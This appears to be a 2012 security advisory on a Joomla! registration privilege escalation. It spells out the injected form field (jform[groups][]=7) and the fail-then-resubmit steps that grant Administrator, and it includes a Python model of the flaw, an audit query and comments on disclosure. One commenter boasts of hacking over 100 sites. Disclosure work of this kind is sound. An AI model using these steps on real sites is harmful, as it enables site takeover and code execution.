Thursday, 15 March 2012 14:47

Joomla! 1.6.x, 1.7.x and 2.5.0-2.5.2 suffer from a privilege escalation vulnerability that allows a self-registered user to be placed into any group that does not hold the 'core.admin' permission.

To exploit it, an attacker visits index.php?option=com_users&view=registration and begins creating a new user. On the first submission the attacker deliberately makes the registration fail, either by entering different values in the two password fields or (in 2.5.x) by failing the captcha. Before submitting that form, the attacker uses Firebug or Tamper Data to add the following parameter to the form data (assuming the site still has the default user groups, where group id 7 is "Administrator"):

  • Firebug: <input name="jform[groups][]" value="7" />
  • Tamper Data: jform[groups][]=7

The form reloads, complaining that the passwords did not match, and in doing so stores the submitted data, injected group included, in the session as form data. The attacker now submits the form again with matching passwords and the same extra parameter. The newly registered user is assigned to the "Administrator" group, because the user registration model re-applies any groups it finds in the session form data; groups supplied directly in the request are never honoured, which is why the deliberately failed first submission is required.
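The two-step flow described above, reduced to a runnable model. This is an added example written for this page, not Joomla!'s own code: `register()` is a simplified stand-in for the registration controller and model, the group ids follow a stock install (2 = Registered, 7 = Administrator), and the session key name and field names are assumptions. It runs the vulnerable logic beside the corrected one (assign only the configured default group, ignore anything in the session) so the difference is visible.

```python
"""Model of the Joomla! 1.6-2.5.2 self-registration flow.

Added, simplified re-implementation for illustration; not Joomla! code.
Assumptions: stock group ids (2 = Registered, 7 = Administrator), a single
session key holding the last failed submission, and the field names below.
"""

REGISTERED, ADMINISTRATOR = 2, 7
FORM_FIELDS = {"name", "username", "email1", "password1", "password2"}
SESSION_KEY = "com_users.registration.data"  # assumed key name


def filter_form(data):
    """JForm-style filtering: drop any field the registration form does not
    define.  This is why jform[groups][] in the *current* request never
    reaches the user object directly."""
    return {k: v for k, v in data.items() if k in FORM_FIELDS}


def validate(data):
    """Return a list of validation errors for the posted form data."""
    errors = []
    if data.get("password1") != data.get("password2"):
        errors.append("Passwords do not match")
    return errors


def register(session, post, default_group=REGISTERED, fixed=False):
    """One trip through the registration controller.

    Returns ('error', errors) when validation fails, or
    ('created', sorted_group_ids) when the account is created.
    """
    errors = validate(post)
    if errors:
        # The raw (unfiltered) post is stashed so the form can be
        # re-populated; the injected 'groups' key travels with it.
        session[SESSION_KEY] = dict(post)
        return ("error", errors)

    # getData(): start from whatever the previous failed attempt left in
    # the session, then overlay the filtered fields of this request.
    data = dict(session.get(SESSION_KEY, {}))
    data.update(filter_form(post))

    if fixed:
        # Corrected behaviour: ignore any group list found in the session
        # and assign only the configured default group.
        groups = [default_group]
    else:
        # Vulnerable behaviour: honour groups already present in the session.
        groups = list(data.get("groups", [])) + [default_group]

    session.pop(SESSION_KEY, None)
    return ("created", sorted({int(g) for g in groups}))


def exploit(fixed=False):
    """Replay the attack: fail once with groups injected, then succeed."""
    session = {}
    base = {"name": "attacker", "username": "attacker",
            "email1": "a@example.invalid", "groups": [str(ADMINISTRATOR)]}
    first = register(session, {**base, "password1": "x", "password2": "y"},
                     fixed=fixed)
    assert first[0] == "error"
    return register(session, {**base, "password1": "x", "password2": "x"},
                    fixed=fixed)


def single_request():
    """Injecting groups in one valid request only: no session data, so the
    extra parameter is simply filtered away."""
    post = {"name": "n", "username": "u", "email1": "e@example.invalid",
            "password1": "p", "password2": "p", "groups": [str(ADMINISTRATOR)]}
    return register({}, post)


if __name__ == "__main__":
    print("vulnerable:", exploit())            # ('created', [2, 7])
    print("patched:   ", exploit(fixed=True))  # ('created', [2])
    print("one shot:  ", single_request())     # ('created', [2])
```

Running it shows the three cases the advisory distinguishes: the failed-then-valid sequence yields groups 2 and 7 on the vulnerable path, the corrected path yields only 2, and a single valid request with the parameter injected yields only 2 on either path.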

After activating the account, the attacker holds a valid account that can log in to the administrator/ interface, edit one of the templates and inject PHP code (assuming the stock permissions and user groups are still in effect). Joomla! 1.6.x and 1.7.x additionally allow members of the "Administrator" group to install extensions, which opens a second route to code execution.
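A check a site owner can run against the impact described above: list every account that sits in a privileged group, with a cut-off on registration date so that front-end registrations made after the bug became public stand out. This is an added example, not Joomla! code. It assumes the stock group ids (7 = Administrator, 8 = Super Users), a 'jos_' table prefix, and the `#__users` / `#__user_usergroup_map` tables of a 1.6+ install; the rows are constructed for the demo and the query runs against an in-memory SQLite copy of that schema.

```python
"""Audit: which accounts are in a privileged group, and since when?

Added example, not Joomla! code.  Assumptions: stock group ids
(7 = Administrator, 8 = Super Users), table prefix 'jos_', and the sample
rows below, which are constructed for this demo.
"""

import sqlite3

PRIVILEGED_GROUPS = {7: "Administrator", 8: "Super Users"}

SCHEMA = """
CREATE TABLE jos_users (
    id INTEGER PRIMARY KEY, username TEXT, email TEXT,
    registerDate TEXT, activation TEXT, block INTEGER);
CREATE TABLE jos_user_usergroup_map (user_id INTEGER, group_id INTEGER);
"""

# Constructed sample data: one legitimate super user, one ordinary
# registered user, and one front-end registration that landed in group 7.
SAMPLE_USERS = [
    (42, "siteowner", "owner@example.invalid", "2011-02-01 10:00:00", "", 0),
    (100, "alice", "alice@example.invalid", "2012-03-10 12:00:00", "", 0),
    (101, "newguy", "newguy@example.invalid", "2012-03-15 16:05:00", "", 0),
]
SAMPLE_MAP = [(42, 8), (100, 2), (101, 2), (101, 7)]


def make_db():
    """Build the in-memory sample database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO jos_users VALUES (?,?,?,?,?,?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO jos_user_usergroup_map VALUES (?,?)", SAMPLE_MAP)
    return conn


def privileged_accounts(conn, registered_since=None, prefix="jos_"):
    """Return (user_id, username, registerDate, group_name) for every member
    of a privileged group, optionally only those registered on or after
    `registered_since` (an ISO 'YYYY-MM-DD HH:MM:SS' string)."""
    placeholders = ",".join("?" * len(PRIVILEGED_GROUPS))
    sql = (
        f"SELECT u.id, u.username, u.registerDate, m.group_id "
        f"FROM {prefix}users u "
        f"JOIN {prefix}user_usergroup_map m ON m.user_id = u.id "
        f"WHERE m.group_id IN ({placeholders})"
    )
    params = list(PRIVILEGED_GROUPS)
    if registered_since is not None:
        sql += " AND u.registerDate >= ?"
        params.append(registered_since)
    sql += " ORDER BY u.registerDate, u.id"
    return [(uid, name, reg, PRIVILEGED_GROUPS[gid])
            for uid, name, reg, gid in conn.execute(sql, params)]


if __name__ == "__main__":
    db = make_db()
    for row in privileged_accounts(db):
        print(row)
    print("registered since disclosure:",
          privileged_accounts(db, "2012-03-15 00:00:00"))
```

Against a live site the same SELECT is run with the real table prefix; any privileged member whose registerDate falls in the window between the site's last audit and the upgrade to 2.5.3 deserves a look, and removing the account alone is not enough if it was ever used to edit a template or install an extension.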

Joomla! 1.0.x, 1.5.x and 2.5.3+ are not vulnerable. No patch has been issued for 1.6.x or 1.7.x; users of those versions are strongly urged to upgrade to 2.5.3 immediately.

Timeline

  • Vendor Notified: 11 March 2012
  • Vendor Response: 11 March 2012
  • Update Available: 15 March 2012
  • Disclosure: 15 March 2012
Last Updated on Thursday, 15 March 2012 15:01
 
Comments (13)
1 Thursday, 15 March 2012 15:40
Tijn!
You're a jerk.
2 Thursday, 15 March 2012 15:47
Jeff Channell
Google translate says this means, "You're a jerk." Maybe next time I'll just release it without sending it to the JSST first? Or maybe I'll hand it off to some less-than-reputable folks with malicious intent in a private manner? Or maybe you're mad I disclosed something you were actively exploiting sites with yourself?

Whatever. Thanks for the comment, asshole...
3 Thursday, 15 March 2012 16:36
Nick Savov
Thanks for reporting this, Jeff!

Kind regards,
Nick
4 Thursday, 15 March 2012 17:17
Alan Langford
Obviously Tijn has never heard the phrase "don't shoot the messenger".

Let's be clear about this, the vulnerability is Joomla's responsibility, not Jeff's. As a member of the project, and the security team, I hate seeing this sort of thing at least as much as anyone else, but I'd much rather see a note from Jeff in the security inbox than a description of the attack on a hacker board.

Still, disclosure shortly after an update does cause some hardship. Right now we have webmasters who are just waking up to discover the update, and they haven't had a chance to apply it. A simple description of the attack vector like this makes it much more likely that they're also waking up to a hacked site.

If the simple description was held back for a while, then only hackers willing to understand the changes to the code would be developing exploits, and that would buy a significant number of sites a few more hours time.

So what Tijn might have been better off saying is "your timing is less than optimal". "Jerk" is, IMO, unjustified.

I agree with Jeff's comment: it could also have been one hell of a lot worse. He deserves credit for not making it so.
5 Friday, 16 March 2012 03:51
Tijn!
Let me say first: 'Jeff deserves praise for finding and reporting this issue'. But secondly 'showing how to do this, just a couple of hours after the bug fix release is a crime'.
First saving someone from a burning house and after this drowning him is bad.
All over the world people are sleeping (it is always somewhere at night), having holidays, doing other things. Not everybody is following Joomla for 24 hours a day. Joomla is used by a lot of free time "developers".
All the hacks in the next days are a blame for Joomla. This is giving Joomla a bad name!
What you do is just expose yourself and don't think about the consequences.
Alan says 'don't shoot the messenger', well, I don't shoot the first messenger, but I do shoot the second one.
Alan says "the vulnerability is Joomla's responsibility, not Jeff's". Joomla is 'us', so it is our responsibility, including Jeff (I hope).
I agree with the rest of what Alan says.
If you would publish this item in a month, I would not blame you, but now.......
6 Friday, 16 March 2012 04:45
Kubik-Rubik
Hi Jeff,

thank you for your work.

Regards
Viktor
7 Friday, 16 March 2012 07:12
Stéphane Bourderiou
Thank you for your follow Jeff

Regards

Stéphane
8 Friday, 16 March 2012 19:46
Stefanie Blaine
Thanks Jeff! I appreciate your efforts!
9 Saturday, 17 March 2012 05:33
vmartinez
I am trying on my websites (1.7.1 & 2.5.1) and the user that it creates is Registered, not Admin.

I am following these steps:

1. go to mydomain + index.php?option=com_users&view=registration

2. The first time I enter the password incorrectly.

3. The second time I insert with Firebug after " .
10 Saturday, 17 March 2012 17:36
CarlosM
I appreciate your effort, I understand the very important security issue. I have upgraded my 1.6 and 1.7 Joomla versions. But I hope you can unpublish this tutorial, I think it is very soon. Not all Joomla users are white hat...
11 Sunday, 18 March 2012 21:37
Vertical Pigeon
Good work Jeff.

Luckily, there are about ten times as many unaffected Joomla! websites as there are affected.

But that still leaves at least 180,000 websites that are vulnerable to this security hole.
12 Wednesday, 28 March 2012 00:28
Derek Joe
I agree with Tijn!, Alan Langford and CarlosM. I feel bad that this tutorial was published. There are many Joomla users who can't read English. Many of them (especially those free time "users") don't even know how to protect their sites. Please don't forget them. Now everyone, not just hackers, could easily hack their sites.
13 Sunday, 22 December 2013 09:17
speeNer
hahahahhahaha hacked more than 100 websites with this vuln! (y)

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.
